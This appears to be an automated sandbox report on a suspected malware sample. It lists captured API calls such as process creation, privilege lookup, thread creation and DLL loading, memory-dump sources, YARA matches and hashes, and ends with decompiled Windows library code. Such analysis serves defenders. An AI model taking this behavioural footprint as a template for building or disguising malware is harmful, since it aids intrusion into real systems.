                                                                                                                                                                • Source File: 00000009.00000002.2371265151.0000000001FE0000.00000040.00000001.sdmp, Offset: 01FD0000, based on PE: true
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2371265151.0000000001FE0000.00000040.00000001.sdmp, Offset: 01FD0000, based on PE: true
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2371265151.0000000001FE0000.00000040.00000001.sdmp, Offset: 01FD0000, based on PE: true
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2371265151.0000000001FE0000.00000040.00000001.sdmp, Offset: 01FD0000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.2371260420.0000000001FD0000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371338809.00000000020C0000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371344209.00000000020D0000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371349487.00000000020D4000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371354968.00000000020D7000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371360264.00000000020E0000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371398748.0000000002140000.00000040.00000001.sdmp
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                                • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                                                                                                                                • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                                • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2371265151.0000000001FE0000.00000040.00000001.sdmp, Offset: 01FD0000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.2371260420.0000000001FD0000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371338809.00000000020C0000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371344209.00000000020D0000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371349487.00000000020D4000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371354968.00000000020D7000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371360264.00000000020E0000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371398748.0000000002140000.00000040.00000001.sdmp
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                                                                                                                                • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                                                                                                                                • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                                                                                                                                • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2371265151.0000000001FE0000.00000040.00000001.sdmp, Offset: 01FD0000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.2371260420.0000000001FD0000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371338809.00000000020C0000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371344209.00000000020D0000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371349487.00000000020D4000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371354968.00000000020D7000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371360264.00000000020E0000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371398748.0000000002140000.00000040.00000001.sdmp
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                                • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                                                                                                                                • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                                • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2371265151.0000000001FE0000.00000040.00000001.sdmp, Offset: 01FD0000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.2371260420.0000000001FD0000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371338809.00000000020C0000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371344209.00000000020D0000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371349487.00000000020D4000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371354968.00000000020D7000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371360264.00000000020E0000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371398748.0000000002140000.00000040.00000001.sdmp
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                                                                                • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                                                                                                                                • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                                                                                • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2371265151.0000000001FE0000.00000040.00000001.sdmp, Offset: 01FD0000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.2371260420.0000000001FD0000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371338809.00000000020C0000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371344209.00000000020D0000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371349487.00000000020D4000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371354968.00000000020D7000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371360264.00000000020E0000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371398748.0000000002140000.00000040.00000001.sdmp
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                                                                                                                                • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                                                                                                                                                • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                                                                                                                                • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2371265151.0000000001FE0000.00000040.00000001.sdmp, Offset: 01FD0000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.2371260420.0000000001FD0000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371338809.00000000020C0000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371344209.00000000020D0000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371349487.00000000020D4000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371354968.00000000020D7000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371360264.00000000020E0000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371398748.0000000002140000.00000040.00000001.sdmp
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                                • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                                                                                                                                • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                                • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2371265151.0000000001FE0000.00000040.00000001.sdmp, Offset: 01FD0000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.2371260420.0000000001FD0000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371338809.00000000020C0000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371344209.00000000020D0000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371349487.00000000020D4000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371354968.00000000020D7000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371360264.00000000020E0000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371398748.0000000002140000.00000040.00000001.sdmp
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                                                                                • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                                                                                                                                • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                                                                                • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2371265151.0000000001FE0000.00000040.00000001.sdmp, Offset: 01FD0000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.2371260420.0000000001FD0000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371338809.00000000020C0000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371344209.00000000020D0000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371349487.00000000020D4000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371354968.00000000020D7000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371360264.00000000020E0000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371398748.0000000002140000.00000040.00000001.sdmp
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2371265151.0000000001FE0000.00000040.00000001.sdmp, Offset: 01FD0000, based on PE: true
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2371265151.0000000001FE0000.00000040.00000001.sdmp, Offset: 01FD0000, based on PE: true
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNELBASE(000007D0), ref: 00096F78
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                • String ID: net.dll$wininet.dll
                                                                                                                                                                • API String ID: 3472027048-1269752229
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNELBASE(000007D0), ref: 00096F78
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                • String ID: net.dll$wininet.dll
                                                                                                                                                                • API String ID: 3472027048-1269752229
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083B93), ref: 000984ED
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FreeHeap
                                                                                                                                                                • String ID: .z`
                                                                                                                                                                • API String ID: 3298025750-1441809116
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083B93), ref: 000984ED
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FreeHeap
                                                                                                                                                                • String ID: .z`
                                                                                                                                                                • API String ID: 3298025750-1441809116
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 000872BA
                                                                                                                                                                • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 000872DB
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessagePostThread
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1836367815-0
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00098584
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateInternalProcess
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2186235152-0
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00089B82
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Load
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2234796835-0
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,0008CF92,0008CF92,?,00000000,?,?), ref: 00098650
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: LookupPrivilegeValue
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3899507212-0
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00098584
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateInternalProcess
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2186235152-0
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00098584
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateInternalProcess
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2186235152-0
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0008CCC0,?,?), ref: 0009703C
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateThread
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2422867632-0
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • RtlAllocateHeap.NTDLL(00093506,?,00093C7F,00093C7F,?,00093506,?,?,?,?,?,00000000,00000000,?), ref: 000984AD
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,0008CF92,0008CF92,?,00000000,?,?), ref: 00098650
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: LookupPrivilegeValue
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3899507212-0
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • SetErrorMode.KERNELBASE(00008003,?,?,00087C63,?), ref: 0008D42B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorMode
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2340568224-0
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • SetErrorMode.KERNELBASE(00008003,?,?,00087C63,?), ref: 0008D42B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorMode
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2340568224-0
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Non-executed Functions

                                                                                                                                                                C-Code - Quality: 94%
                                                                                                                                                                			E02018788(signed int __ecx, void* __edx, signed int _a4) {
                                                                                                                                                                				signed int _v8;
                                                                                                                                                                				short* _v12;
                                                                                                                                                                				void* _v16;
                                                                                                                                                                				signed int _v20;
                                                                                                                                                                				char _v24;
                                                                                                                                                                				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E02018460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E01FFE025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E0201718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E02018460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E01FFE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E0201718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E02018460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E02018460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E02018460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E01FFE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E01FFE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E0201718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E01FFE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E01FF2340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E0200E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E01FFE2A8(_t322,  &_v68, _v16);
								if(E02015553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E0200E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E01FFE2A8(_t322,  &_v68, _t236);
								if(E02015553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E01FFE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E01FFE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E0201718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E01FFE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E01FF2340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E0200E679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E01FFE2A8(_v12,  &_v68, _v16);
							if(E02015553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
